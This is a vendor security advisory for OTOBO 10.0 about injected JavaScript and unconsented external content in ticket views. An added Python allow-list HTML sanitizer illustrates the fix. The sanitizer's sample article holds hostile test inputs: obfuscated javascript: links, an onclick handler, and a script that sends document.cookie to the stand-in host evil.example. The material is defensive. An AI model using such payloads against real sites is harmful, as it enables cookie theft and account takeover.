SECURITY ADVISORY
Injection of JS Code via Customer Management
- PUBLISHED: March 27, 2024
- RELEASE TYPE: Security Patch Release
- CRITICALITY: LOW
- AFFECTED VERSIONS: OTOBO 10.0
- REFERENCE: —
Description
Problem
- We fixed a vulnerability that allowed external content to be displayed in the ticket detail view without the user's active consent. OTOBO is now considerably stricter in its handling of HTML in general, for example HTML that is rendered in articles.
Many thanks to Tim Püttmanns (maxence), who brought this vulnerability to our attention.
Potential Consequences
- Display of External Content in Ticket Details Without Active Consent
Measures for Secure Operation
Update to OTOBO 10.0.20
A security patch update is available to fix the vulnerability. Please update your system.
Bug Fixes
- [Security Enhancement] Update to CKEditor Version 4.22.1
- [Security Enhancement] JavaScript tags are now filtered out of links
- [Bugfix] Fixed a bug that caused incorrect ticket attributes to be used in ACLs after ticket creation in some cases
- [Bugfix] Fixed an error that prevented standard values from being displayed correctly in dynamic fields on many masks
- and more (see the full changelog)
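The following is an added example written for this page; it is not OTOBO's own HTML filter and does not show how OTOBO 10.0.20 implements the fix. It illustrates the two measures the advisory describes with a small allow-list sanitizer: links whose target resolves to a javascript: scheme (including case, control-character and entity-encoded variants) lose their href, and remote images are replaced by a placeholder until the user opts in. The placeholder path and the sample article are constructed for the example.

```python
"""Added example (not OTOBO's own code): an allow-list HTML sanitizer that
illustrates the two measures in this advisory, dropping javascript: URLs
from links and withholding remote content until the user opts in.
Standard library only; the placeholder path is a hypothetical asset."""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

LINK_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL
IMG_SCHEMES = {"", "http", "https", "cid"}       # cid: = inline mail part
VOID_TAGS = {"br", "img"}
PLACEHOLDER = "/hypothetical/blocked-external.svg"   # assumed local asset

# Browsers discard tabs, newlines and other controls inside a scheme, so
# "java\tscript:" must be normalised before the scheme is checked.
_CTRL = re.compile(r"[\x00-\x20\x7f]")


def _parts(url: str):
    return urlsplit(_CTRL.sub("", url))


def safe_url(url: str, allowed: set) -> bool:
    """True if the normalised, lower-cased scheme is on the allow list."""
    return _parts(url).scheme in allowed


def is_remote(url: str) -> bool:
    """True if rendering the URL would fetch content from another host."""
    p = _parts(url)
    return p.scheme in {"http", "https"} or bool(p.netloc)


class ArticleSanitizer(HTMLParser):
    """Rebuilds article HTML keeping only allow-listed tags and attributes."""

    ALLOWED = {"p": set(), "br": set(), "b": set(), "i": set(), "ul": set(),
               "li": set(), "a": {"href"}, "img": {"src", "alt"}}

    def __init__(self, allow_external: bool = False):
        super().__init__(convert_charrefs=True)   # &#106; etc. arrive decoded
        self.allow_external = allow_external
        self.out, self._skip = [], None
        self.dropped_links = self.blocked_external = self.dropped_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag not in self.ALLOWED:               # script, iframe, object, ...
            self.dropped_tags += 1
            if tag in ("script", "style"):
                self._skip = tag                  # swallow their bodies too
            return
        kept = []
        for name, value in attrs:                 # names arrive lower-cased
            if name not in self.ALLOWED[tag] or value is None:
                continue                          # onclick, style, ... never copied
            if name == "href" and not safe_url(value, LINK_SCHEMES):
                self.dropped_links += 1
                continue                          # keep <a>, drop the javascript: target
            if name == "src":
                if not safe_url(value, IMG_SCHEMES):
                    continue
                if is_remote(value) and not self.allow_external:
                    self.blocked_external += 1
                    value = PLACEHOLDER           # shown until the user consents
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self._skip:
            self._skip = None
        elif tag in self.ALLOWED and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip is None:
            self.out.append(escape(data, quote=False))


def sanitize(html: str, allow_external: bool = False) -> dict:
    p = ArticleSanitizer(allow_external)
    p.feed(html)
    p.close()
    return {"html": "".join(p.out), "dropped_links": p.dropped_links,
            "blocked_external": p.blocked_external, "dropped_tags": p.dropped_tags}


# Constructed sample article covering common javascript: obfuscations.
SAMPLE_ARTICLE = (
    '<p>Hello <b>team</b>,</p>'
    '<a href="https://example.com/kb">docs</a> '
    '<a href="JaVaScRiPt:alert(1)">one</a> '
    '<a href="java&#09;script:alert(2)">two</a> '
    '<a href="&#106;avascript:alert(3)">three</a> '
    '<a href="/ticket/42" onclick="steal()">local</a>'
    '<img src="cid:part1.png" alt="inline">'
    '<img src="https://tracker.example.net/pixel.gif" alt="tracker">'
    '<script>location="https://evil.example/?c="+document.cookie</script>'
)

if __name__ == "__main__":
    result = sanitize(SAMPLE_ARTICLE)
    print(result["html"])
    print(f"links dropped: {result['dropped_links']}, remote images blocked: "
          f"{result['blocked_external']}, tags dropped: {result['dropped_tags']}")
```

Two design points matter more than the tag list. First, the scheme check runs after control characters are stripped and after the HTML parser has decoded character references, because a deny-list regex on the raw attribute text misses `java&#09;script:` and `&#106;avascript:`; an allow-list of schemes also rejects `vbscript:` and `data:` links without listing them. Second, the remote-content decision is a separate, per-render choice (`allow_external`), so the same sanitizer serves both the default view and the view after the user has explicitly consented.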
We're happy to answer your questions. Contact us.
If you are a support customer and need assistance with the security patch, please contact us through your access in the support portal.
Report a security issue:
security@otobo.org